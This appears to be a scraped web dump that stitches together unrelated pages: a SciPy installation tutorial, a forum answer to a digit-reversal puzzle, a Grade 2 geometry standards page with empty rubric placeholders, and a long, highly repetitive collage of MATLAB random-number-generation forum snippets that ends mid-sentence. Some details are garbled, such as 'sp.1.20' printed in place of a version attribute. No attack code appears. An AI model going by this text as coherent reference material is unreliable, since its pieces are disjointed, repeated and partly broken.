{"ft_lang_label":"__label__en","ft_lang_prob":0.8640848,"math_prob":0.8443822,"size":12883,"snap":"2022-05-2022-21","text_gpt3_token_len":3250,"char_repetition_ratio":0.14302352,"word_repetition_ratio":0.14285715,"special_character_ratio":0.2345727,"punctuation_ratio":0.100187615,"nsfw_num_words":2,"has_unicode_error":false,"math_prob_llama3":0.98265797,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-22T18:03:34Z\",\"WARC-Record-ID\":\"<urn:uuid:f1f96ab9-054d-44a7-8df7-268d32bea88b>\",\"Content-Length\":\"49833\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:744faee0-e556-4f7c-bfd0-6966fcd3eb2e>\",\"WARC-Concurrent-To\":\"<urn:uuid:0365e018-276c-4572-9fea-9c6769a3e4cd>\",\"WARC-IP-Address\":\"198.46.81.194\",\"WARC-Target-URI\":\"https://www.aplusanswers.com/4-bit-full-adder-multiplexer-decoder-buffer/\",\"WARC-Payload-Digest\":\"sha1:2SZMG2SYLIZ5RRVILYIRL7GKU4TJZXXW\",\"WARC-Block-Digest\":\"sha1:NLZEBL2QTXZFX5IQSPGYU2XJQJ2DLISR\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320303868.98_warc_CC-MAIN-20220122164421-20220122194421-00693.warc.gz\"}"}
https://herongyang.com/Neural-Network/Python-SciPy-Library-for-Mathematical-Functions.html
[ "SciPy - Python Library for Mathematical Functions\n\nThis section provides a tutorial example on how to install Python 3 SciPy library on macOS computers. SciPy is widely used by Python users for mathematical functions required in neural network models.\n\nWhat Is SciPy? SciPy is an open-source Python library for scientific computing developed initially by Travis Oliphant and now maintained by the SciPy community.\n\nIf you want to build neural network models in Python, you should install SciPy and get familiar with its functionalities by following this tutorial. This is because neural network models require lots of mathematical functions, which are provided in SciPy.\n\n1. Install SciPy library using the \"pip3\" (Package Installer for Python 3) command:\n\n```herong\\$ python3 --version\nPython 3.8.0\n\nherong\\$ sudo pip3 install scipy\nCollecting scipy\nInstalling collected packages: scipy\nSuccessfully installed scipy-1.5.0\n```\n\n3. Verify SciPy installation by importing \"scipy\" package, retrieving its version string, and calling some statistical functions.\n\n```herong\\$ python3\nPython 3.8.0 (v3.8.0:fa919fdf25, Oct 14 2019, 10:23:27)\n\n>>> import scipy as sp\n>>> sp.1.20\n'1.5.0'\n\n>>> import numpy as np\n>>> s = np.random.rand(1000000)\n\n>>> from scipy import stats\n\n>>> stats.tmean(s)\n0.5000266615822236\n\n>>> stats.tvar(s)\n0.08345433925168123\n```\n\nNote that:\n\n• random.rand() function from NumPy library was used to generate a dataset of 1,000,000 random numbers between 0 and 1.\n• stats.tmean() function from SciPy library calculated the mean value of the dataset as 0.5000266615822236, which is very close to the theoretically value of 0.5.\n• stats.tvar() function from SciPy library calculated the variance value of the dataset as 0.08345433925168123, which is very close to the theoretically value of 0.08333... (or 1/12).\n\nCool! You have SciPy library ready on your Python 3 environment for matrix operations.\n\nFor more readings on SciPy, visit SciPy documentation Website at https://docs.scipy.org/doc/scipy/reference/." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.69642246,"math_prob":0.66193306,"size":2033,"snap":"2021-21-2021-25","text_gpt3_token_len":475,"char_repetition_ratio":0.1424347,"word_repetition_ratio":0.01438849,"special_character_ratio":0.24299066,"punctuation_ratio":0.15320334,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98925716,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-10T22:34:59Z\",\"WARC-Record-ID\":\"<urn:uuid:014b9bd5-8dba-4f3f-923d-a298c2115cdb>\",\"Content-Length\":\"11112\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2d7c4059-5374-4dec-8a77-0627bf668d52>\",\"WARC-Concurrent-To\":\"<urn:uuid:4817ba69-70fc-4dbb-8439-780f05145ead>\",\"WARC-IP-Address\":\"74.208.236.35\",\"WARC-Target-URI\":\"https://herongyang.com/Neural-Network/Python-SciPy-Library-for-Mathematical-Functions.html\",\"WARC-Payload-Digest\":\"sha1:4N5SPI7HL3OISORPGXDK3HYJUAHVCBWH\",\"WARC-Block-Digest\":\"sha1:IHRCYIDE3JYRPJOYY3BLGPGU6LT3CYCR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243989749.3_warc_CC-MAIN-20210510204511-20210510234511-00520.warc.gz\"}"}
https://web2.0calc.com/questions/help-plz_74921
[ "+0\n\n# help plz\n\n0\n185\n1\n\nThe sum of the digits of a two digit positive integer is 15 , when the digits are reversed the number is 27 more than the original number . what was the original number?\n\nJul 8, 2021\n\n#1\n+1\n\nx+y = 15       y = 15 -x\n\n10y + x  = 27 + 10x + y       sub in red equation for y\n\n10(15-x) + x = 27 + 10x + 15-x\n\n150-10x+x     = 27 +10x+15-x\n\n108 = 18x       x = 6     then y =9\n\nJul 8, 2021" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.82346284,"math_prob":0.9999826,"size":319,"snap":"2022-27-2022-33","text_gpt3_token_len":116,"char_repetition_ratio":0.13650794,"word_repetition_ratio":0.08108108,"special_character_ratio":0.46081504,"punctuation_ratio":0.04054054,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99963903,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-17T19:44:05Z\",\"WARC-Record-ID\":\"<urn:uuid:bc3bff84-a25f-4a1c-8c0a-23f19ec1d4f0>\",\"Content-Length\":\"20885\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6ff2a488-efd0-4c24-a0f3-e1f2432cf3e9>\",\"WARC-Concurrent-To\":\"<urn:uuid:221fd8e3-b252-4d65-8439-4f424c258f45>\",\"WARC-IP-Address\":\"49.12.23.161\",\"WARC-Target-URI\":\"https://web2.0calc.com/questions/help-plz_74921\",\"WARC-Payload-Digest\":\"sha1:QZVYVNYEUFF75XOEZANGLTMSZ5YLECSF\",\"WARC-Block-Digest\":\"sha1:5V5XGPC67J6RDLMIWLCZVGLO63JEIZZG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882573104.24_warc_CC-MAIN-20220817183340-20220817213340-00711.warc.gz\"}"}
https://learnbps.bismarckschools.org/mod/glossary/view.php?id=107232&mode=cat&hook=4206
[ "# MAT-02 \"I can ... statements\"\n\n (G) Geometry Categories All categories Not categorized (G) Geometry (MD) Measurement and Data (NBT) Number and Operations in Base Ten (OA) Operations and Algebraic Thinking Prioritized\n\n# Geometry\n\n## Narrative for the (G) Geometry\n\nGrade 2 students learn to name and describe the defining attributes of categories of two-dimensional shapes, including circles, triangles, squares, rectangles, rhombuses, trapezoids, and the general category of quadrilateral. They describe pentagons, hexagons, octagons, and other polygons by the number of sides. Because they have developed both verbal descriptions of these shapes and their defining attributes and a rich store of associated mental images, they are able to draw shapes with specified attributes, such as a shape with five sides or a shape with six angles.\n\nStudents in Grade 2 also explore decompositions of shapes into regions that are congruent or have equal area. For example, two squares can be partitioned into fourths in different ways. Any of these fourths represents an equal share of the shape (e.g., “the same amount of cake”) even though they have different shapes.\n\n## Calculation Method for Domains\n\nDomains are larger groups of related standards. The Domain Grade is a calculation of all the related standards. Click on the standard name below each Domain to access the learning targets and rubrics/ proficiency scales for individual standards within the domain.\n\n#### MAT-02.G.01\n\nUnder Development\n\n MAT-02 Targeted Standards(G) Domain: GeometryCluster: Reason with shapes and their attributes. MAT-02.G.01 Recognize and draw shapes having specified attributes, such as a given number of angles or a given number of equal faces. Identify triangles, quadrilaterals, pentagons, hexagons, and cubes.\n\n• I can\n\n• I can\n\n• I can\n\n• I can\n\n## Proficiency (Rubric) Scale\n\n Score Description Sample Activity 4.0 Student is able to - 3.5 In addition to Score 3.0 performance, the student demonstrates in-depth inferences and applications regarding the more complex content with partial success. 3.0 “The Standard.” Student is able to - 2.5 No major errors or emissions regarding 2.0 content and partial knowledge of the 3.0 content. 2.0 Student is able to - 1.5 In addition to 1.0 content, student has partial knowledge of the 2.0 and/or 3.0 content. 1.0 Student is able to - 0.5 Limited or no understanding of the skill id demonstrated.\n\n## Resources\n\n### Vocabulary\n\n• List\n\n#### MAT-02.G.02\n\nUnder Development\n\n MAT-02 Targeted Standards(G) Domain: GeometryCluster: Reason with shapes and their attributes. MAT-02.G.02 Partition a rectangle into rows and columns of same-size squares and count to find the total number of them.\n\n• I can\n\n• I can\n\n• I can\n\n• I can\n\n## Proficiency (Rubric) Scale\n\n Score Description Sample Activity 4.0 Student is able to - 3.5 In addition to Score 3.0 performance, the student demonstrates in-depth inferences and applications regarding the more complex content with partial success. 3.0 “The Standard.” Student is able to - 2.5 No major errors or emissions regarding 2.0 content and partial knowledge of the 3.0 content. 2.0 Student is able to - 1.5 In addition to 1.0 content, student has partial knowledge of the 2.0 and/or 3.0 content. 1.0 Student is able to - 0.5 Limited or no understanding of the skill id demonstrated.\n\n## Resources\n\n### Vocabulary\n\n• List\n\n#### MAT-02.G.03\n\n MAT-02 Targeted Standards(G) Domain: GeometryCluster: Reason with shapes and their attributes. MAT-02.G.03 Partition circles and rectangles into two, three, or four equal shares, describe the shares using the words halves, thirds, half of, a third of, etc., and describe the whole as two halves, three thirds, four fourths. Recognize that equal shares of identical wholes need not have the same shape. Partition: Divide into pieces. (ND)\n\n## Student Learning Targets:\n\n### Knowledge Targets\n\n• I can identify one-half, one-fourth, and one-third shaded parts.\n\n### Reasoning Targets\n\n• I can understand that the same shape can be divided into equal parts in different ways.\n\n### Skills (Performance) Targets\n\n• I can divide circles and rectangles into 2,3,and 4 equal parts in different ways.\n• I can use the words halves, thirds, fourths, and half of to describe the equal parts.\n• I can describe one whole as being 2 halves, 3 thirds, and 4 fourths.\n\n## Rubric / Proficiency Scale\n\n Score Description Sample Activity 4.0 Student is able to partition shapes into parts with equal areas; express the area of each part as a unit fraction of the whole; determine if fractions are equivalent; and use models to prove if fractions are greater than/less than another. I can write a fraction to represent the shaded portion of a shape. I can represent a fraction using models or pictures. I can explain why fractions are equivalent. I can use pictures/models to prove if a fraction is greater than/less than another fraction. - 3.5 In addition to Score 3.0 performance, the student demonstrates in-depth inferences and applications regarding the more complex content with partial success. 3.0 Student is able to partition circles and rectangles into two, three, and four equal parts without error; use the words halves, thirds, fourths; and recognize equal shares of identical wholes can have different shapes. I can divide shapes into 2, 3, and 4 equal parts in more than one way with no mistakes. I can use the words halves, thirds, and fourths to describe the equal parts. - 2.5 No major errors or emissions regarding 2.0 content and partial knowledge of the 3.0 content. 2.0 Student is able to divide shapes/pictures into halves and fourths in more than one way without error. I can divide shapes into 2 and 4 equal parts in different ways with no mistakes. I can use the words halves and fourths to describe the equal parts. - 1.5 In addition to 1.0 content, student has partial knowledge of the 2.0 and/or 3.0 content. 1.0 Student is able to identify shapes that have 1/2 and 1/4 parts shaded without error. I can identify shapes/pictures that show 1/2 and 1/4 with no mistakes. - 0.5 Limited or no understanding of the skill is demonstrated.\n\n## Resources\n\n### Vocabulary\n\n• partition / divide\n• equal shares / parts\n• whole\n• one half\n• one fourth\n• one third\n• half of\n• third of\n• fourth of\n• halves\n• thirds\n• fourths\n• two halves\n• three thirds\n• four fourths" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.56784,"math_prob":0.8327486,"size":839,"snap":"2020-10-2020-16","text_gpt3_token_len":211,"char_repetition_ratio":0.16766468,"word_repetition_ratio":0.4040404,"special_character_ratio":0.20262218,"punctuation_ratio":0.104347825,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9652802,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-02T19:52:52Z\",\"WARC-Record-ID\":\"<urn:uuid:16ce7c0d-9f11-46b6-9501-e838d870f01b>\",\"Content-Length\":\"93757\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4f6697c6-f465-4a18-ac4c-8d7eaaa31e13>\",\"WARC-Concurrent-To\":\"<urn:uuid:540e53ae-33bf-4df4-9513-5a4915f11bb2>\",\"WARC-IP-Address\":\"165.234.103.74\",\"WARC-Target-URI\":\"https://learnbps.bismarckschools.org/mod/glossary/view.php?id=107232&mode=cat&hook=4206\",\"WARC-Payload-Digest\":\"sha1:RTIOCKRFR76UUHBGO2RISVWCORQKCEDI\",\"WARC-Block-Digest\":\"sha1:2KMHA7U2SDV7HXRKRDE2FS7TFAU42WCD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585370507738.45_warc_CC-MAIN-20200402173940-20200402203940-00220.warc.gz\"}"}
http://pharmaqforms.co.za/o6rf80n/random-generators-matlab.php
[ "# Random generators matlab\n\nLearn more about random numbers, seed To generate a different sequence of random numbers we use a \"seeding\" function. Ask Question 2. generator is published at among Technical Solutions for Matlab as Solution Number 1- 10HYAS, where the problem is demonstrated using a sequence of 5·10 7 consecutive random numbers obtained using the default setting of rand. This way of invoking the generator is available also in the current releases of Matlab. 8 to 4). MATLAB provides built-in functions to generate random numbers with an uniform or Gaussian (normal) distribution. Generate random coordinates around a circle. However, the random number generator it switches to this time is an even older one that was introduced as far back as MATLAB version 4. However they manage to pass many statistical tests of randomness and independence. I want to generate 50 random numbers (with both x and y coordinates) between 0 and 100, but they shouldn't be in the area of two yellow rectangles displayed in the figure. e. Learn more about random number generator, mean, standard-deviation MATLABUse this block to generate random binary-valued or integer-valued data. generate random numbers in range from (0. Generate a random list of words from 2500+ of the most common English words. Open Script. Re: Need a good random generator for matlab a good method for random number generation would be to pick out the time in microseconds from the system clock with a precision of 6 digits at random intervals. ActionScript . Learn more about random number generatorGenerating a random binary matrix. I've found the RANDSTREAM object that has the seed property, but it's read only. Hi, I am an Mechanical student and i am trying to generate a random rough surface (with specified ACF and Std Deviation) using 2D FIR filter in Matlab. 1) Generate 1000 random numbers. Can anyone help me to generate several strings of random integer ? In each string, there must be 5 integers generated which the number are in between 1 and 484. S. Random Numbers, Mean and Standard Deviation in MATLAB: In probability theory, the normal distribution is a very commonly occurring probability distribution — a function that tells the How can I generate random numbers in MATLAB with a fixed sum? How can I plot the projection and the reflection of 3 points onto a plane in MATLAB? How can I add shadowing factor to number of random points generated in MATLAB that represent BTS so that each point has different path loss? How to make a random number generator with a Learn more about matlab, random number generator, distribution generator MATLAB Useful functions and Pseudo-Random Number Generators Exercise Load the MATLAB le returns. If possible, I would like to remove this source of variability. If they type any other letter, the program is terminated. com/questions/18486241/comparing-matlab-and-numpy-code-that-uses-random-number-generationAug 28, 2013 One way to ensure the same numbers are fed to your process is to generate them in one of the two languges, save them and import into the The rand function generates arrays of random numbers whose elements are Generate a uniform distribution of random numbers on a specified interval [a,b] . I've searched on google for the subroutine in MATLAB for generating Dirichlet random vectors, but it seems to turns out nothing. I need to generate a Random Binary Sequence of 1x10000 size. Random number generators can be used to approximate a random integer from a uniform distribution. There are four fundamental random number functions: rand, randi, randn, and randperm. I tried the intrinsic functions, 'randn'. 8 to 4) Thanks. I achieve to do this pulse random generator with these blocks: A uniform random number, a matlab function that convert this pulses in other with amplitude +1/-1. Learn more about random numbers, seed2002/09/08 · Hi! I just need to generate random numbers that follow some distribution like poisson, exponential,normal,etc. rand: Uniformly distributed random numbersrandperm: Random permutationrandn: Normally distributed random numbersRandom Number Generators - MATLAB & Simulinkhttps://www. Open up a fresh copy of a recent version of MATLAB and ask it about the random number generator it’s using This is about exercise #5: a random maze generator. 5678, 7. Generating random numbers using for loop. Is there a way to generate from the normal distribution? Can anyone help me to generate several strings of random integer ? In each string, there must be 5 integers generated which the number are in between 1 and 484. That is why they are referred to as pseudorandom generators. 23, No. However, the statistics of these calculations will remain unaffected. MathWorks Machine Translation. The idea is that: the distance is as close as possible. The automated translation of this page is provided by a general purpose third party translator tool. Every time you start MATLAB, the generator resets itself to the same state. —uniform random number generators —random variate generators •The statistical test: •Components —k is the number of bins in the histogram —oi is the number of observed values in bin i in the histogram —ei is the number of expected values in bin i in the histogram •The test —if the sum is less than , then the hypothesis that the MathWorks Machine Translation. . Could anybody tell me how to generate random symmetric positive definite matrices using MATLAB? Stack Exchange Network Stack Exchange network consists of 174 Q&A communities including Stack Overflow , the largest, most trusted online community for developers to learn, share their knowledge, and build their careers. Learn more about random number generatorgenerate random numbers in range from (0. MathWorks Machine Translation. random. mathworks. MATLAB 5 uses a new multiseed random number generator that can generate all the floating-point numbers in the closed interval Theoretically, it can generate over values before repeating itself. In other words, you can not generate analog signals in matlab. Monte Carlo simulations) are not The following is the Matlab code used to generate the figure, which shows MathWorks Machine Translation. num = ceil(rand*3); but I need different values suppose i wanna generate random data from 0 to 3 (ie, qpsk data) in matlab simulink unsing random integer generator. In the case of Matlab and C, this generator is the \"rand()\" function. Learn more about random numbers, seed$\\begingroup$ First, read about the Box-Muller method of generating a pair of independent Gaussian random variables with mean zero and variance $1$. they are big. You can write your own function to generate a random unitary matrix with an input as its dimension. Learn more about random numbers, seedProblem asked to write a code where the user types a number (the amount of random numbers they want) and asked if they would like to continue generating random numbers (works if they type 'y'). 5 meter. generating random signal. For example if I could input some sort of \"bias\" parameter which determines the extent to which the numbers tend to be closer to 0 than to 1, for example. This example shows how to use the rng function, which provides control over random number generation. This page explains why it's hard (and interesting) to get a computer to generate proper random numbers. You can generate noise for communication system modeling using the MATLAB Function block with a random number generator. comhttps://www. The following 2 Matlab Help on random RANDOM Generate random arrays from a specified distribution. Let‟s first look try using the formula for creating random numbers from A to B. 0, where later is exclusive, by multiplying output with and then type casting into int, we can generate random integers in any range. After starting MATLAB, the random number generator resets itself always to the same initial state. 2 Compute the Cholesky decomposition of the covariance matrix. The program quickly outputs n random integers in the range from a to b. Now, calculate the sum of this array. 5 to 2 hours to run the code. I understand the random numbers generated from normal distribution in matlab actually come from standard normal distribution. CombRecursive (also known as MRG32k3a): Matches the MATLAB® generator of the same name and produces identical results given the same initial state. for which i need random 4bit sequeces like 1111 1010 1110 1000 so can any one tell me how to generate such sequences in matlab i mean 4bit typed. Problem asked to write a code where the user types a number (the amount of random numbers they want) and asked if they would like to continue generating random numbers (works if they type 'y'). Just share, comment, and Subscribe :)Author: Ka MirulViews: 3,2KRANDOM. Purely Random 1's and 0's. The seed is a number that controls whether the Random Number Generator produces a new set of random numbers or repeats a particular sequence of random numbers. Hi everyone: I am trying to generate true random number by MATLAB. output should be vector form like [0 1 1 2 0 3 1 generating random signal. The Missing Link. Could anybody tell me that How one can generate a random singular matrices using matlab? I know that using rand(n) we can generate a random matrix of order n. MATLAB uses the Mersenne Twister as its default random number generator. With a different default generator, MATLAB will generate different sequences of random numbers by default in the context of tall arrays. To do this, multiply the output of rand by (b-a) then add a. If the text box labeled \"Seed\" is blank, the Random Number Generator will produce a different set of random numbers each time a random number table is created. But I found that these random matrices are non singular while I am interested in generating random singular matrices of higher order. Use rand , randi , randn , and randperm to create arrays of random numbers. I guess the function is rand(). {-1,1}) randomly. However, Matlab environment has already predefined functions to generate random numbers: RAND Uniformly distributed random numbers. random(). more generally, to generate random value between [a b] you can use a generator like this. For these distributions there are functions available directly like poissrnd for Random Noise Generators. . Random Word Generator » A word randomizer for finding quick inspiration. Save the current state of the random number generator and create a 1-by-5 vector of random 5 Jan 2012I have to agree with the other answers, stating that these generators are not \"absolute\". @Arnab: See Azzi's and Image Analyst's answers, which contains exactly the same. Open the model doc_noise_generators. Ask Question 23. Maybe the function needed to have input and output arguments and you didn't give them. Open Live Script C/C++ Code Generation Generate C and C++ code using MATLAB® Coder™. Look at the site:Hi everyone: I am trying to generate true random number by MATLAB. Hi all please i need to know how to generate a Poisson distributed random variable without using the built-in function (poissrnd). Pseudo-Random Number Generators Part of the postgraduate journal club series, Mathematics, UQ ALWAYS run your simluation with more than one pseudo-random number generator. how i get random number between two numbers , like i want random number between 20-150 like this , random, i know the max number and the minimum number and i want to matlab gave me a random number between the max and the minimum In MATLAB you have a function that generates a random matrix. This way, the same random numbers are produced as if you restarted MATLAB. Generate a random number in a certain range in MATLAB. Hi! I just need to generate random numbers that follow some distribution like poisson, exponential,normal,etc. 255-265. 25, >=-0. To be specific I need a 60x6 matrix that has columns for; force, pressure, torque, thickness and radius with the last column being the cost function for the genetic algorithm. svnit@gmail. 15. For example, to generate a 5-by-5 array of uniformly distributed random numbers on the interval [10,50] Generating a Pseudo-random sequence of plus/minus 1 integers 5 answers In Matlab, I need to generate signs (i. 116k 19 209 389. Sequences of statistically random numbers are used to simulate complex mathematical and physical systems. How to check randomness of random number generators? Ask Question 10. Each of these maintains its own state). In releases up to R2018b, the default random number generator for tallrng is combRecursive. The results also pass various statistical tests of randomness and independence. Select a Web Site. Honey is a free tool that finds better deals, tracks price drops, and shows you price history on Amazon. generate n random number between two numbers Learn more about random numbers generator, exponential distribution, random . The key takeaway is that one should not use rand('seed',x) or rand In other words, you can not generate analog signals in matlab. MATLAB Answers Problem asked to write a code where the user types a number (the amount of random numbers they want) and asked if they would like to continue generating random numbers (works if they type 'y'). Learn more about random numbers, seedRandom Noise Generators. Learn more about random number generator. Comparing Matlab and Numpy code that uses random number generation stackoverflow. mat. Replace Discouraged Syntaxes of rand and randn. 007 . MATLAB Function Reference : randn. RANDOM. This MATLAB function lists all the generator algorithms that can be used when creating a random number stream with RandStream or RandStream. generating random signal. The same commands will work in Matlab. and the figure below shows the distribution of generated x values within the boundaries. The default settings are the Mersenne Twister with seed 0. As, i dont want to use any system toolbox only have to use a matlab script. Computing with random generators (MATLAB) Jul 4, 2011 #1. Used in computing, a random string generator can also be called a random character string generator. Pseudo-random number generation Lecture Notes by Jan Palczewski it is a standard generator in Matlab, Octave, R-project, S-plus. Comparing Matlab and Numpy code that uses random number generation Is there some way to make the random number generator in numpy generate the same random numbers as in Matlab, given the same seed? I tried the following in Matlab: Or could someone suggest a good idea to compare two implementations of the same algorithm in Matlab and This Matlab program is written by Ali Khaledi-Nasab @Ohio_University Here we generate random tree networks using 4 different types of branchings. The Statistics Toolbox has a built-in function to do this, but I don’t have a license for this toolbox. How can I generate random values with a uniform distribution in the interval] 0,2π] in Matlab? How do I write a code in MATLAB to generate modulated waveforms in 0/1 with 10 bit? How do I get MATLAB on a MacBook 32-bit? Re: Need a good random generator for matlab a good method for random number generation would be to pick out the time in microseconds from the system clock with a precision of 6 digits at random intervals. The following Matlab project contains the source code and Matlab examples used for linear congruential random number generator. Dear Matlab Community, I am currently working on a problem, which can be simplified to such a summary: generate a set of random numbers, check if these random numbers meet a specified condition, if they do - save them, if they don't - generate next set of random numbers. The performance problem is in populating the last Array \"W\" with the random number generator. However, software applications, such as MATLAB ®, use algorithms that make your results appear to be random and independent. algorithms and MATLAB code for generating random variables for some useful distributions. 1. However, this function does not exist in Octave, so let‟s create our own random integer generator. ORG is a true random number service that generates randomness via atmospheric noise. For more information type “help randn” in the Matlab Command Window. With the advent of Generating random numbers Problem. Repeat until you have m numbers; This can be done with randi and could even be vectorized by just drawing a lot of random numbers at each step until the unique amount is correct. There are tools in MATLAB to generate random integers in an interval. Introduction to Randomness and Random Numbers. Learn more about random numbers, seedAbout random number generators. Many PRNGs which are good for statistical purposes (e. Alternatively, this generator may be invoked by seeding rand with the command rand(’state’,seed). using while loops and random number generators. Learn more about generate, random, signal, random signal, generate random signal generate n random number between two numbers Learn more about random numbers generator, exponential distribution, random . Generate Random Numbers That Are Repeatable. How to generate a random number in 5 decimal points in the range between 0 and 10 with 0. com Visit http://urbanschool. 1 Analysis versus Computer Simulation such as MATLAB, which can generate random numbers, to deal with these problems. [MATLAB] Generating random numbers and dice simulator (self. For these distributions there are functions available directly like poissrnd for Generating Exponentially Distributed Random Numbers in MATLAB For a recent project one of my research students needed to generate exponentially distributed random numbers in MATLAB. generate random numbers in range from (0. I need 20 nodes between the coordinates of 0-100 during each iterations 20 nodes have to be created at random coordinates. If we need to generate 100 uniform random numbers on the set 0 : 1 in Matlab, we can just type rand(100, 1). 0. This function changes between different random number generators and sets the seed for the generator. by Dr Mads Haahr. MathWorks does not warrant, and disclaims all liability for, the accuracy, suitability, or fitness for purpose of the translation. My task is to randomly generate numbers for age between 18 and 121 - we need 11000 numbers. random number generator. crowso crowso. Usage notes and limitations: Run the command by entering it in the MATLAB Command Window. Chapter 1 Random number generators and random processes Ifwelookaround,wenoticethatmanyprocessesarenondeterministic,i. py The output was MATLAB file contains 1000001 seeds and 10 samples per seed Random numbers for seed 0 differ between MATLAB and Numpy I want to generate 50 random numbers (with both x and y coordinates) between 0 and 100, but they shouldn't be in the area of two yellow rectangles displayed in the figure. A Random Number Generator (RNG) is a device designed to produce a series of outcomes completely devoid of pattern or predictability. I had to restart my code last night and it's been 14 hours and it is still running. 0,1. How can I set the seed on my own, so every time I run this test I will get the same results? (yeah, I know it's a little bit weird, but that's the problem). Generating random number. We will be using randi() command for generating random numbers in range. Learn more about random number generator Random Color Generator Matlab scripts download notice Top 4 Download periodically updates scripts information of random color generator full scripts versions from the publishers, but some information may be slightly out-of-date. org, the numbers are generated based on atmospheric noise and skew-corrected to generate uniform numbers. Decimal random number generator. If you want the sum of the numbers to be X multiply the complete array of r Random Number Generators, Mersenne Twister Posted by Cleve Moler , April 17, 2015 This is the first of a multi-part series about the MATLAB random number generators. e. The rand function in MATLAB returns uniformly distributed pseudorandom values from the open interval (0, 1), but we often need random numbers of other kind of distributions. This example shows how to create an array of random integer values that are drawn from a discrete uniform distribution on the set of numbers –10, –9,,9, 10. How to create a 3D Terrain with Google Maps and height maps in Photoshop - 3D Map Generator Terrain - Duration: 20:32. Problem asked to write a code where the user types a number (the amount of random numbers they want) and asked if they would like to continue generating random numbers (works if they type 'y'). Learn more about random numbers, seed1 Short Help on random and randn You can use the random command to generate random vectors and matricies. Use the randi function (instead of rand) to generate 5 random integers from the uniform distribution between 10 and 50. scurr = rng returns the current settings of the random number generator used by rand , randi , and randn . (Use randn function to have a normal distribution) 2) Count how many numbers are < -0. You can only assume that you can not perceive any signal with changes beyond the sampling frequency you set. The function TRUERAND returns truly random integers using random. I need to perform few tests where I use randn pseudo random number generator. htmlUse the random number generation user interface randtool to generate random numbers interactively. For algorithms validation, Matlab comes as a very handy tool. I am new to Matlab and therefore have a few questions regarding generation of random numbers. I am trying to make a matrix that generates random numbers but each column is associated with a different variable. RAND(N) is an N-by-N matrix with random entries, chosen from a uniform distribution on the interval (0. There is nothing wrong with MATLAB’s random number generator at all. MATLAB Answers Generating Random Numbers on a GPU Open Script This example shows how to switch between the different random number generators that are supported on the GPU and examines the performance of each of them. I come across a paper that helps me doing that. normaldistribution. Try the faster more private Brave Browser now with Tor tabs. random generators matlab I've also changed the image to grayscale in order to get a white shade for my point of interest. Learn more about random number generatorA random number table is a listing of random numbers where we can choose the quantity of random numbers desired, the maximum and minimum values of numbers in the table, and whether or not duplicate numbers are allowed. 2012/01/05 · Matlab Basics: Tutorial - 18: How to generate Random Numbers in Matlab Generating Uniform Random Numbers in MATLAB - Duration: Random Numbers in Matlab - …Hi Azzi, The maximale distance between two impulses may be 2 ms, for example. To allow repeated values in the output (sampling with replacement), use randi(n,1,k) . Guy on Simulink. A recent article on random number generators is by Pei-Chi Wu: Multiplicative, Congruential Random-Number Generators with Multiplier +/-2 k1 +/-2 k2 and Modulus 2 p-1, ACM Transactions on Mathematical Software, June 1997, v. 1 Compute the covariance matrix of the data. As default i get only 4 decimals. Learn more about generate, random, signal, random signal, generate random signal A random number table is a listing of random numbers where we can choose the quantity of random numbers desired, the maximum and minimum values of numbers in the table, and whether or not duplicate numbers are allowed. We call this generator as method Generating random number. This is the default generator for GPU calculations. Inverse transform sampling: . Learn more about generate, random, signal, random signal, generate random signal Random Integers. Random Numbers in MATLAB. create. 4. Open up a fresh copy of a recent version of MATLAB and ask it about the random number generator it’s using Random Countries » Get a country (name and flag) at random for the worst way to name your vacation destination ever. That is the reason why random seqences repeat. 2, pp. com//prob. 04,0. By Rick Wicklin on The DO Loop June 1, PYTHON, R and Matlab, just to name a few, it would be great if How to generate AWGN noise in Matlab/Octave (without using in-built awgn function) Posted on June 15, 2015 August 23, 2018 by Mathuranathan in Channel Modelling, Latest Articles, Matlab Codes, Signal Processing, Tips & Tricks, Tutorials This reminded me of the one of the first times I played with the Julia language where I learned that Julia’s random number generator used a SIMD-accelerated implementation of Mersenne Twister called dSFMT to generate random numbers much faster than MATLAB’s Mersenne Twister implementation. Afterwards we need to figure out male and female (0 is females) which I'm having difficulties with. You can control that shared random number generator using rng. Extended Capabilities. For example, I want to generate a random number between -10 and 10. All the random number functions, rand, randn, randi, and randperm, draw values from a shared random number generator. Optimizing generating random number in Matlab. Another helpful function when you are testing code using a random number generator is “rng()”. My question is: if I have a discrete distribution or histogram, how can I can generate random numbers that have such a distribution (if the population (numbers I generate) is large enough)? Im trying to estimate an area using Monte Carlo Simulation from an image I've extracted using GeoChart. With the advent of If you want to generate random integers from A to B in Matlab, you can use the randi( ) function. Computational Finance – p. Matloff Contents 1 Uniform Random Number Generation 2 2 Generating Random Numbers from Continuous Distributions 3Computational Statistics with Matlab Mark Steyvers May 13, 2011. Also offers 